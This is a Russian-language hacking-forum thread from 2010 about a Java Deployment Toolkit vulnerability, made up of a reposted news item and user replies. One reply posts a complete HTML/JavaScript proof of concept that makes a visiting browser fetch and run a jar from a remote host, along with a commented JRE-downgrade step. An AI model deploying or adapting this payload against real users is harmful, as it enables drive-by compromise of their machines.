Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Программная “дыра” в Java делает пользователей Windows уязвимыми перед хакерами |
13.04.2010, 09:50
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 15
Провел на форуме:
35437
Репутация:
5
|
|
Программная “дыра” в Java делает пользователей Windows уязвимыми перед хакерами
Тревожные известия пришли для пользователей компьютеров под управлением операционной системы Windows. Сразу из двух источников появились сообщения об обнаружении в технологии Java новой уязвимости, которая может использоваться хакерами для атак на Windows PC. Причем, для осуществления такой атаки пользователям достаточно посетить веб-страницу с вредоносным кодом.
Специалист Google Тавис Орманди (Tavis Ormandy) и работник компании Wintercore Рубен Сантамарта (Ruben Santamarta) независимо друг от друга опубликовали в различных источниках подробности о данной уязвимости. По их словам, проблема связана с фреймворком Java Web Start, позволяющим разработчикам легко создавать Java приложения. При этом Тавис Орманди подчеркивает, что отключение данного Java плагина отнюдь не является панацеей от хакерских атак.
По данным специалистов, с помощью указанной уязвимости (которую, кстати, оказалось очень легко обнаружить) злоумышленник способен передавать произвольные параметры в утилиту и, в конечном счете, получать контроль над системой. В блоге Threat Post лаборатории Касперского говорится, что эта уязвимость может использоваться на всех актуальных версиях Windows, а также в популярных браузерах, включая Firefox, Internet Explorer и Chrome.
Тавис Орманди отмечает, что он проинформировал разработчиков технологии Java Web Start из Sun Microsystems об обнаруженной проблеме. Однако ему сообщили, что в компании не считают приоритет данной уязвимости достаточно высоким, чтобы выпустить патч для нее вне стандартного квартального цикла.
12.04.2010
Источник
Последний раз редактировалось Suicide; 13.04.2010 в 10:36..
|
|
|
13.04.2010, 16:50
|
|
Участник форума
Регистрация: 31.08.2009
Сообщений: 106
Провел на форуме:
179198
Репутация:
7
|
|
О_о Ссылку на код в студию.
|
|
|
|
13.04.2010, 16:52
|
|
Постоянный
Регистрация: 06.02.2009
Сообщений: 385
Провел на форуме:
2920922
Репутация:
230
|
|
Удалаю java к чертям  ))) |
|
|
|
13.04.2010, 17:33
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940
Репутация:
1257
|
|
Windows делает пользователей Windows уязвимыми перед хакерами
|
|
|
|
13.04.2010, 17:54
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 15
Провел на форуме:
35437
Репутация:
5
|
|
Ссылки на код нет
|
|
|
|
13.04.2010, 18:00
|
|
[bald man]
Регистрация: 13.07.2009
Сообщений: 623
Провел на форуме:
4490909
Репутация:
1167
|
|
повсюду одни дыры..
до этого новость была про 25 дыр.. в вин
|
|
|
|
13.04.2010, 18:02
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666
Репутация:
439
|
|
Сообщение от mr.The
Windows делает пользователей Windows уязвимыми перед хакерами
дырка в java, при чём тут windows?
|
|
|
|
13.04.2010, 18:18
|
|
Постоянный
Регистрация: 28.12.2007
Сообщений: 328
Провел на форуме:
3054717
Репутация:
170
|
|
А они опубликуют место с дырочкой или так, попугать решили?
|
|
|
|
13.04.2010, 18:23
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Сообщение от zlo12
А они опубликуют место с дырочкой или так, попугать решили?
http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemi d=1
Код HTML:
<html>
<head><title>Java Deployment Toolkit Test Page</title></head>
<body>
<script>
// Tavis Ormandy <taviso@sdf.lonestar.org>, April 2010
var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";
if (window.navigator.appName == "Microsoft Internet Explorer") {
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
// Trigger the bug
o.launch(u);
} else {
// Mozilla
var o = document.createElement("OBJECT");
var n = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
n.type = "application/java-deployment-toolkit";
document.body.appendChild(o);
document.body.appendChild(n);
// Test both MIME types
try {
// Old type
o.launch(u);
} catch (e) {
// New type
n.launch(u);
}
}
// Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to
// this classic exploit?
// http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1
// o.installJRE("1.4.2_18");
</script>
</body>
</html>
Последний раз редактировалось BlackSun; 13.04.2010 в 18:26..
|
|
|
|
13.04.2010, 18:55
|
|
Постоянный
Регистрация: 01.11.2009
Сообщений: 525
Провел на форуме:
1063460
Репутация:
75
|
|
Сообщение от .antibiotic.
повсюду одни дыры..
до этого новость была про 25 дыр.. в вин
вдуватели и сюда добрались 
лиж бы дыру найти
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
